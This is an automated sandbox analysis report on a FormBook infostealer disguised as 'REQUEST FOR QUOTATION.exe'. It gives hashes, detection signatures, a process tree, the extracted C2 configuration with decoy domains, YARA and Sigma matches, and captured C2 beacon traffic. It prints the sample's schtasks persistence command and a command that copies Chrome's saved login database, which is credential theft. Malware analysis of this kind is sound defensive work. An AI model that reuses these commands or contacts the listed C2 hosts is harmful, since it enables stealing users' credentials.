Loading ...

Play interactive tourEdit tour

Analysis Report REQUEST FOR QUOTATION.exe

Overview

General Information

Sample Name:REQUEST FOR QUOTATION.exe
Analysis ID:356564
MD5:1d229f76672a250bd0c2ff84417d63e3
SHA1:907889ef592995b2e923bc367ad5fe5fb3ab8275
SHA256:65dbaf77c991e5737ecf9041dea34a7e9eca1e38925ff69340435a3cff1314a3
Tags:FormBook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • REQUEST FOR QUOTATION.exe (PID: 6992 cmdline: 'C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe' MD5: 1D229F76672A250BD0C2FF84417D63E3)
    • schtasks.exe (PID: 7132 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • REQUEST FOR QUOTATION.exe (PID: 3848 cmdline: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe MD5: 1D229F76672A250BD0C2FF84417D63E3)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 6284 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 240 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.entrustedhomeinspections.com/xxg/"], "decoy": ["avoidandaxidents.com", "splendorinthewoods.com", "soubeta.digital", "sellfreecourses.com", "upstreamleadership.com", "crescentdough.com", "yycqfw.com", "tmfosbqhu.icu", "franmogulfranchise.com", "xn--qrq5jk69mkda.com", "moreiramenezes.com", "defidegen.com", "corchosc.com", "jemadrqhxaahe.com", "gerderser.com", "bajihalozat.com", "stickleyrep.com", "sah-ko.net", "kenapa5-and.com", "truehealerwithin.com", "conkamx.com", "therukoothutamil.com", "laikaswatches.com", "paradiseminks.com", "jerikashofashion.com", "brickhouse.cloud", "theozserver.com", "surendra-sharma.com", "malaysianmoney.com", "artoutlive.online", "lovingsunmarket.com", "premiumnetworkstore.com", "160meter.com", "geeksgambit.com", "voluminousaesthetics.com", "secure000-amazon.com", "jrubrand.com", "oxz5.com", "sonoscape.email", "naigves.com", "htwa.net", "rfl.xyz", "kuangjiam99.com", "inventqa.com", "9ine-tees.com", "188jersey.com", "yourspartanyard.com", "upwardinjesus.life", "644745.com", "deepbluedecor.com", "schleperkortebau.info", "txsurvivalkit.com", "tooplaya.com", "fukaikeji.com", "tntvor.com", "internationalsoccerteams.com", "attorneyscottrynecki.com", "ptpatennis.com", "hottomsoutlet.com", "oshitapartscenter.com", "tropicalcure.com", "mastermindsnow.com", "covidacademicexpert.com", "energiern.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 15 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18419:$sqlite3step: 68 34 1C 7B E1
        • 0x1852c:$sqlite3step: 68 34 1C 7B E1
        • 0x18448:$sqlite3text: 68 38 2A 90 C5
        • 0x1856d:$sqlite3text: 68 38 2A 90 C5
        • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
        1.2.REQUEST FOR QUOTATION.exe.32b277c.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 8 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Scheduled temp file as task from temp locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe' , ParentImage: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe, ParentProcessId: 6992, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp', ProcessId: 7132
            Sigma detected: Steal Google chrome login dataShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\systray.exe, ParentImage: C:\Windows\SysWOW64\systray.exe, ParentProcessId: 6284, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 240

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.entrustedhomeinspections.com/xxg/"], "decoy": ["avoidandaxidents.com", "splendorinthewoods.com", "soubeta.digital", "sellfreecourses.com", "upstreamleadership.com", "crescentdough.com", "yycqfw.com", "tmfosbqhu.icu", "franmogulfranchise.com", "xn--qrq5jk69mkda.com", "moreiramenezes.com", "defidegen.com", "corchosc.com", "jemadrqhxaahe.com", "gerderser.com", "bajihalozat.com", "stickleyrep.com", "sah-ko.net", "kenapa5-and.com", "truehealerwithin.com", "conkamx.com", "therukoothutamil.com", "laikaswatches.com", "paradiseminks.com", "jerikashofashion.com", "brickhouse.cloud", "theozserver.com", "surendra-sharma.com", "malaysianmoney.com", "artoutlive.online", "lovingsunmarket.com", "premiumnetworkstore.com", "160meter.com", "geeksgambit.com", "voluminousaesthetics.com", "secure000-amazon.com", "jrubrand.com", "oxz5.com", "sonoscape.email", "naigves.com", "htwa.net", "rfl.xyz", "kuangjiam99.com", "inventqa.com", "9ine-tees.com", "188jersey.com", "yourspartanyard.com", "upwardinjesus.life", "644745.com", "deepbluedecor.com", "schleperkortebau.info", "txsurvivalkit.com", "tooplaya.com", "fukaikeji.com", "tntvor.com", "internationalsoccerteams.com", "attorneyscottrynecki.com", "ptpatennis.com", "hottomsoutlet.com", "oshitapartscenter.com", "tropicalcure.com", "mastermindsnow.com", "covidacademicexpert.com", "energiern.com"]}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exeReversingLabs: Detection: 14%
            Multi AV Scanner detection for submitted fileShow sources
            Source: REQUEST FOR QUOTATION.exeVirustotal: Detection: 28%Perma Link
            Source: REQUEST FOR QUOTATION.exeReversingLabs: Detection: 14%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: REQUEST FOR QUOTATION.exeJoe Sandbox ML: detected
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: REQUEST FOR QUOTATION.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
            Source: REQUEST FOR QUOTATION.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: systray.pdb source: REQUEST FOR QUOTATION.exe, 00000005.00000002.711557561.0000000001690000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.934087091.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: systray.pdbGCTL source: REQUEST FOR QUOTATION.exe, 00000005.00000002.711557561.0000000001690000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: REQUEST FOR QUOTATION.exe, 00000005.00000002.710064884.0000000001190000.00000040.00000001.sdmp, systray.exe, 00000008.00000002.923476107.0000000005190000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: REQUEST FOR QUOTATION.exe, 00000005.00000002.710064884.0000000001190000.00000040.00000001.sdmp, systray.exe
            Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.934087091.0000000005A00000.00000002.00000001.sdmp
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 4x nop then pop ebx5_2_00407AFA
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 4x nop then pop edi5_2_00416CB4
            Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop ebx8_2_03227AFC
            Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi8_2_03236CB4

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 166.62.28.109:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 166.62.28.109:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 166.62.28.109:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.entrustedhomeinspections.com/xxg/
            Source: global trafficHTTP traffic detected: GET /xxg/?Jt7=XPIX3NrP&GlW8J=a8BlEgGkOe5HuSVVIZfAbA83PDdExW7ERnrZA1n9agEZzoNw0EhQ9Eby65z8jt1XZsvj HTTP/1.1Host: www.premiumnetworkstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ+NpuMmHjL7rBp7fN9vXv0Msl1t0&Jt7=XPIX3NrP HTTP/1.1Host: www.internationalsoccerteams.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 204.11.56.48 204.11.56.48
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: global trafficHTTP traffic detected: POST /xxg/ HTTP/1.1Host: www.premiumnetworkstore.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.premiumnetworkstore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.premiumnetworkstore.com/xxg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 6c 57 38 4a 3d 53 65 4e 66 61 48 4b 75 4d 38 52 58 33 7a 51 43 57 38 4b 57 42 56 77 68 45 79 70 36 34 56 62 30 50 68 36 76 52 48 6a 46 63 68 30 61 30 49 67 71 34 58 67 46 79 7a 6e 30 6f 4b 6e 30 68 66 6c 58 53 4f 6d 35 49 51 46 50 6d 79 64 61 45 43 47 6f 53 41 48 62 70 35 31 4b 70 50 4b 31 49 34 4a 44 34 6e 42 59 53 4c 55 39 59 59 34 49 53 49 76 5a 31 38 61 6a 54 68 6e 31 58 76 41 57 56 69 47 4d 39 5a 37 63 42 45 73 50 49 43 53 4b 6c 44 72 51 46 6b 58 66 70 69 65 35 50 63 43 49 52 64 42 48 5a 52 4b 34 52 4d 42 41 32 6f 78 63 72 50 47 72 62 58 30 6f 54 57 61 4d 54 37 67 6b 32 34 4f 66 71 52 55 5f 44 47 42 35 67 56 42 42 65 65 35 48 42 6a 64 39 75 4a 77 72 64 6b 50 74 7a 54 46 31 43 76 71 38 28 55 39 4e 51 61 38 72 32 63 56 37 62 6f 39 44 59 74 4f 67 4c 55 44 61 4f 66 74 6e 57 58 72 4b 4d 49 37 35 6f 32 5a 72 4c 32 71 6c 77 67 69 4a 67 70 7a 61 69 51 42 78 6e 42 50 54 71 55 6d 71 65 4a 4a 4c 57 48 6f 4e 4e 67 6a 78 77 71 63 4e 38 71 55 4d 38 49 33 43 58 74 34 70 64 51 51 7a 5a 6d 64 6d 45 31 51 68 66 78 6a 76 33 30 75 44 30 59 4d 76 5a 64 70 5f 4c 52 7a 66 65 76 5a 55 53 55 4c 7a 55 30 6b 51 71 63 55 43 50 5f 58 6a 77 5f 31 31 53 45 36 6c 67 54 65 71 33 44 55 6c 77 4b 4d 74 78 30 67 7a 6f 75 6c 70 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GlW8J=SeNfaHKuM8RX3zQCW8KWBVwhEyp64Vb0Ph6vRHjFch0a0Igq4XgFyzn0oKn0hflXSOm5IQFPmydaECGoSAHbp51KpPK1I4JD4nBYSLU9YY4ISIvZ18ajThn1XvAWViGM9Z7cBEsPICSKlDrQFkXfpie5PcCIRdBHZRK4RMBA2oxcrPGrbX0oTWaMT7gk24OfqRU_DGB5gVBBee5HBjd9uJwrdkPtzTF1Cvq8(U9NQa8r2cV7bo9DYtOgLUDaOftnWXrKMI75o2ZrL2qlwgiJgpzaiQBxnBPTqUmqeJJLWHoNNgjxwqcN8qUM8I3CXt4pdQQzZmdmE1Qhfxjv30uD0YMvZdp_LRzfevZUSULzU0kQqcUCP_Xjw_11SE6lgTeq3DUlwKMtx0gzoulpng).
            Source: global trafficHTTP traffic detected: POST /xxg/ HTTP/1.1Host: www.premiumnetworkstore.comConnection: closeContent-Length: 170935Cache-Control: no-cacheOrigin: http://www.premiumnetworkstore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.premiumnetworkstore.com/xxg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 6c 57 38 4a 3d 53 65 4e 66 61 46 72 66 4f 4d 56 47 77 42 6b 48 58 73 62 62 46 55 41 7a 41 77 39 70 28 47 36 46 43 54 7e 5f 52 45 37 42 55 41 6c 66 6a 34 38 71 7e 52 30 43 34 7a 6e 31 71 4b 6e 33 32 76 70 5f 62 39 57 78 49 55 64 6c 6d 79 56 5a 4e 6e 43 74 53 77 47 42 6d 35 6f 35 39 5f 65 75 49 38 73 6a 35 42 67 4c 58 4b 6f 39 46 34 41 4b 65 4d 71 64 38 64 57 6d 51 56 28 4b 56 75 5a 51 55 52 54 6c 39 38 79 7a 57 77 4d 4e 4d 7a 6d 42 67 43 62 34 42 7a 7a 75 6c 53 36 2d 41 2d 28 56 56 2d 31 44 59 55 7e 61 62 75 35 44 36 34 5a 53 39 39 75 6a 4f 32 77 37 55 47 72 39 54 36 6b 53 73 39 4f 4b 35 43 51 4e 50 58 64 66 72 45 31 44 51 50 35 66 46 6d 4a 71 7e 35 42 5f 55 45 28 4d 33 44 5a 67 42 70 6d 73 67 42 70 66 41 2d 74 71 69 2d 38 45 57 62 78 4c 58 4e 28 41 46 31 48 42 41 73 6c 76 58 55 48 77 53 59 37 61 71 32 5a 64 54 55 54 53 6e 53 4f 4f 68 35 69 49 28 44 52 64 70 78 6a 65 7e 78 75 79 42 37 31 57 5a 53 77 52 46 43 36 4f 39 70 77 4b 39 49 49 34 71 34 33 63 64 4f 51 55 64 51 52 4b 5a 6b 31 63 43 42 41 68 5a 30 66 34 33 58 32 48 79 59 4e 74 61 4e 5a 48 42 42 50 50 65 76 42 55 41 52 6e 56 62 69 41 51 74 50 63 42 50 61 6a 6a 33 50 31 31 65 6b 37 36 76 44 72 49 6a 6d 6c 58 77 4d 67 62 34 45 5a 61 70 76 51 6d 35 4f 78 4f 50 65 6f 39 31 38 41 65 33 4b 74 33 66 56 7e 72 50 35 75 50 59 46 6c 53 64 79 6f 77 34 31 34 43 66 70 77 51 36 67 68 45 72 51 30 4a 78 6e 48 79 71 6c 30 73 56 57 55 6e 32 78 47 46 53 36 6c 72 41 2d 73 32 7a 52 47 76 44 6f 6c 51 61 68 79 37 44 36 50 75 28 4d 42 55 47 37 6f 32 42 32 72 7a 4f 6b 62 30 37 52 41 68 44 54 4d 51 65 36 6a 43 71 48 76 44 65 46 34 2d 49 4b 78 4f 6e 4f 76 50 31 45 67 47 75 6b 47 35 30 52 76 76 6e 46 61 41 62 64 7a 67 6f 34 63 5f 49 51 57 32 58 52 52 4b 45 6d 47 72 6a 5f 51 61 4e 63 53 75 58 4e 70 75 35 32 68 72 75 30 48 73 54 44 70 33 6f 48 56 4d 28 73 53 36 6e 79 33 38 6f 36 59 68 43 57 66 4e 46 7a 46 52 6f 37 54 52 36 4c 30 6d 67 37 50 2d 73 63 48 62 36 53 35 48 6e 4d 46 51 63 34 69 6e 39 6b 68 67 56 5f 73 49 39 59 28 56 6e 57 69 70 41 5a 63 55 71 48 62 33 4a 64 37 79 7a 76 57 6b 62 4d 35 63 41 36 51 31 50 62 6e 6f 73 76 4c 31 44 63 5a 53 4e 66 4b 37 37 4f 4a 43 64 6b 33 36 55 74 33 4d 37 4f 76 4e 38 43 53 56 32 56 53 78 46 46 44 7a 5a 72 6a 34 49 67 50 78 70 42 6f 5a 58 43 28 5f 56 6e 4f 48 7e 4c 75 59 74 54 78 74 4d 49 6b 71 28 42 7e 48 6a 41 33 49 53 6d 4f 41 68 38 7e 34 73 6e 32 55 78 77 75 54 4f 38 65 4e 75 53 7e 7a 73 64 48 45 42 69 47 62 6c 37 6d 50 4e 36 41 64 65 69 6a 48 31 76 55 76 61 4a 42 71 49 4e 45 64 76 6b 6e 45 69 5f 57 32 58 68 53 59 72 2d 6c 57 79 41 75 75 45 75 30 43 66 7
            Source: global trafficHTTP traffic detected: POST /xxg/ HTTP/1.1Host: www.internationalsoccerteams.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.internationalsoccerteams.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.internationalsoccerteams.com/xxg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 6c 57 38 4a 3d 53 69 35 51 55 31 47 63 42 74 4c 68 48 6f 34 70 43 32 41 39 67 38 42 41 6f 61 30 4b 76 57 75 59 74 2d 31 69 65 6d 78 4b 5a 4e 56 69 6f 38 36 63 79 6f 4b 6e 4d 2d 47 6f 52 4d 72 65 36 57 77 47 74 6c 73 46 76 72 4d 78 51 68 33 55 61 6c 47 72 36 6a 52 49 4f 6c 6e 58 6e 67 58 41 31 44 69 69 71 37 4f 73 59 67 43 74 34 73 4d 7a 72 66 57 2d 71 47 4f 52 32 57 6b 66 4a 53 4c 59 30 72 78 72 52 6a 75 50 4e 78 44 4b 41 35 53 48 6a 44 28 6b 51 7a 78 61 51 36 73 48 54 37 63 66 79 30 7e 79 7e 49 32 58 37 34 46 5a 5a 62 33 36 32 66 41 7a 56 34 35 6c 46 70 7a 77 63 36 65 49 77 4d 56 33 74 4b 44 30 72 72 4a 4a 72 5f 76 76 31 73 54 4b 56 32 71 75 59 71 4c 58 48 35 31 36 4d 5f 37 30 68 33 58 43 56 79 6e 45 37 53 64 46 31 42 51 70 73 64 64 46 74 49 6c 52 33 65 57 79 47 72 51 78 50 78 32 51 33 63 77 4e 56 53 49 61 5a 76 41 4c 71 70 49 54 48 48 56 2d 45 33 58 4a 32 54 66 38 56 6f 62 5f 45 77 4c 4f 4c 31 67 55 44 31 42 72 35 37 55 4a 51 39 37 2d 7a 57 54 67 41 45 46 4c 6d 33 52 70 6e 75 6b 48 44 75 37 32 75 50 31 50 4d 4d 4f 62 28 5f 71 63 6b 45 48 76 6b 42 46 43 71 33 6a 4e 42 52 70 55 37 6d 62 63 78 75 6b 58 6b 67 4b 77 6a 39 4f 7a 38 57 39 6c 66 32 31 37 44 53 79 5f 46 46 4e 39 69 44 51 54 33 4d 6d 50 4b 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GlW8J=Si5QU1GcBtLhHo4pC2A9g8BAoa0KvWuYt-1iemxKZNVio86cyoKnM-GoRMre6WwGtlsFvrMxQh3UalGr6jRIOlnXngXA1Diiq7OsYgCt4sMzrfW-qGOR2WkfJSLY0rxrRjuPNxDKA5SHjD(kQzxaQ6sHT7cfy0~y~I2X74FZZb362fAzV45lFpzwc6eIwMV3tKD0rrJJr_vv1sTKV2quYqLXH516M_70h3XCVynE7SdF1BQpsddFtIlR3eWyGrQxPx2Q3cwNVSIaZvALqpITHHV-E3XJ2Tf8Vob_EwLOL1gUD1Br57UJQ97-zWTgAEFLm3RpnukHDu72uP1PMMOb(_qckEHvkBFCq3jNBRpU7mbcxukXkgKwj9Oz8W9lf217DSy_FFN9iDQT3MmPKQ).
